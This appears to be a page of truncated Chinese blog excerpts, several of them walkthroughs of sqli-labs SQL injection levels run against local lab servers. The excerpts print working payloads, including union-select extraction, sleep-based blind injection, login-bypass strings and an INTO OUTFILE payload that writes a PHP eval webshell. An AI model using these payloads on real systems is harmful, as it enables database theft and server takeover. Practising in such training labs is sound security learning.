第三十一关 这关一样,闭合变成(",简单测试,#号不能用 ?id=1") and ("1")=("1")--+ 第三十二关 这关会把我们的输入里的单引号前面都加一个\使得单引号转义,使它没有任何意义只是一个字符,所以应该是宽字节注入.什么是宽字节? 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称其字符为宽字节. 所有英文默认占一个字节,汉字占两个字节 常见的宽字节编码:GB2312,GBK,GB18030,BIG5

          0x00 实验环境 本地:Win 10 靶场:sqli-labs(共65关,每日一关) 0x02 通关记录 简介:一天一关! (5)第五关: 由于此处与前四关有明显的差别,故在此我分为独立的一篇进行记录. 此处是基于回显正常与不正常的注入类型,不会很明显的显示出注入的结果,正常时,页面显示: 不正常时,页面会出现报错或者是无回显: (1)利用left(version(),1)=5进行尝试,当前的mysql版本为: http://127.0.0.1/sqli-labs/Less

                          0x00 实验环境 本地:Win 10 靶场:sqli-labs(共65关,每日一关) 0x02 通关记录 简介:一天一关! (1)第一关: 简单的注入: 首先尝试',会出现报错: 然后尝试使用:and 1=1 --+ ,会发现显示正常,这是因为该查询语句不再看前面的id=2'的报错参数,转而发现and 1=1 是一条正常的语句: and 1=2后就会出现异常,且不会显示任何数据: 然后以列单位进行排序操作:当order by 到第三列,都是正

环境搭建:https://www.cnblogs.com/kagari/p/11910749.html 总体感受:sqli-labs还是只适合入门 在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag Less-1 http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23 Less-2 http://172.16.124.149/Less-2/?id=0

 在此关卡我学习到了 1.只要跟数据库交互的多观察几遍.特别是对于http头这种类型的注入方式. 2. <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(); function check_input($value) { if(!empty($value)) { // truncation (see comme

这个关卡开始好像进入新的知识区了,前面几个是让我们加深对盲注的印象.接下来又是新知识了!皮卡丘,接招吧! 代码是从SQL-libs的第十七关卡扣的. 页面效果如下所示: PHP面完整CODE如下所示: <?php include("../sql-connections/sql-connect.php"); error_reporting(); function check_input($value) #定义一个函数为check_input,里面有一个参数为$value. { if

这个关卡之前我还使用了一下工具跑,发现居然跑不出来.这就尴尬了.行吧手工试试. payload admin") and If(ascii(substr(database(),1,1))=115,sleep(5),1)#

这关是延时的了. Payload: -admin' or sleep(10)# 需要注意的是,--+不行反而#才可以.具体缘由可见<sql注入之你问我答>第20问:http://www.cnblogs.com/xishaonian/p/6036909.html CODE:

这一节让我学习到了 1.extractvalue函数(该函数用于对xml文件进行查询和修改,于此相关的还有一个叫“updatexml”函数) 语法:extractvalue(XML_document, XPath_string);  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程. 作用:从目标XML中返回包含所查询值的字符串 关于该函数

输入账号:'123密码:456就报错了,报错如下所示: 跟刚才一样的.双引号换成了单引号而已. 注入为布尔型盲注,可以使用二分法注入 THE END

通过这个关卡我学习到了: 1.双引号千万别忘记,就是因为忘了弄了好一会儿.一直不报错. 2. 00x1万能密码构造二 报错的内容为: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin") LIMIT 0,1' at line 1 可以看出,他在我们输入的哪里多加了一个

在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1 SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可以猜测其网站的正常是SQL语句如下: $sql="select username,password from 表明 where username='$username' and password='$password' limit 0,1" 即使如此,那么来尝试将其闭合. 账号密码同时尝试

好像咋整都没辙.实在是关卡越高越不好整. 弄报错.咋整咋不报错. and sleep(10);鸭蛋的也不好搞.实在没辙.就看源码了. 由代码得出payload: THE END

通过这个关卡 1.更快的掌握到了如何判断是否是延时注入 无论咋输入,都不行.当payload为: http://127.0.0.1/sql/Less-9/index.php?id=1' and sleep(10)--+ 回车,发现sleep(10)得到执行了.说明是可以注入的.并且是延时注入.那么就让我们来看看这个延时有什么与众不同吧. 这题也是延时注入,不知道是不是有别的方法.如果大家知道敬请奉告! THE END

该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用. 通过源代码我们很容易的写出了payload.倘若我们一个个去尝试的话,说实话,不容易. http://127.0.0.1/sql/Less-7/index.php?id=1')) and 1=1--+ Payload: http://127.0.0.1/sql/Less-7/index.php?id=1')) union select 1,'<?php eval($_POST[cmd])?>',3 into outfi

第六关跟第五关一样的是布尔型盲注技术. 只是在部分有出路 添加一个单引号.程序无反应.双引号和斜杠可使其报错. 这一关让我学到了 1.管他三七二十七报错看看语句再说. THE END

这一关卡让我学习到了 1.管他如何,想方设法先让sql报错再说.从报错中构造sql注入语句. 2.单引号不行就来双引号.括号等等的. 这次单引号没反应了.以后我们先来黑盒测试,实在没辙再看代码. -1有反应但是没数据 想办法把他弄报错.正在挣扎之际.成功了.不下心看了一下源码的.否则还真不好搞. 测试了很多方法 http:/index.php?id=--1' http:' http://127.0.0.1/sql/Less-4/index.php?id=1 and 1=1 --+ .......

/*此时心情xxxx*/ 通过这一关卡我学习到了 1.大概的能够mysql回显错误注入的面目,可以根据报错,写出闭合语句. 加一个单引号.报错如下所示. 加了一个单引号就说 1'') LIMIT 0,1' at line 1 其实就可以猜出他的sql语句大概的是怎么样的了. 应该是这样的. select * form admin where ('$id'); 根据司机水平而定. 进而写出payload ') union select 1,2,3 --+ 来看看源码是否如此. 果不其然吧.

在这个关卡学习到了 1.程序的错误不是学校收费乱来的,单引号的错误和减号的错误要明白 单引号报错. 用第一关的PAYLOAD尝试了下. 来看看源码: 那么我们构造的sql也就变成了 $sql="SELECT * FROM users WHERE id=1' or 1=1 --+ LIMIT 0,1"; 如此一来id=1'就不被执行,语句也就成了: $sql="or 1=1 --+ limit 0,1"; 用mysql测试一下,如下图.的确如此! 那么单引号不行就换负

在第一个关卡当中还是学到些知识. 1.注释语句多试试其他的几个 2.不报错可能是前面的语句没有错误,union没有得到执行. http://127.0.0.1/sql/Less-1/index.php?id=1'         加单引号报错了. 从上面的错误提示当中,我们可以看到提交到sql中的1'在经过sql语句构造后形成 '1'' LIMIT 0,1,多加了一个 ' .接下来想如何将多余的 ' 去掉 可以借鉴一下源码 得出payload: 'or 1=1--+ 是不是这条语句就成功的绕过了

通过该关卡我学习到了 1.if语句的三目运算符(其实说白了也就是php里的三位运算符) 2.sleep函数 3.substring函数(其实和substr一样) 4.limit的灵活运用 5. Start Study 先来科普延时注入知识吧. 延时注入方法很简单:就是利用IF的三目运算符使用substring函数来判断字符的ASCII码值,进而猜解出正确的内容. 拿下面的案例而言,如果字符串hello的首字母的ASCII码大于120的话那么延时十秒,否则输出1.下面的案例是延时了十秒. Exam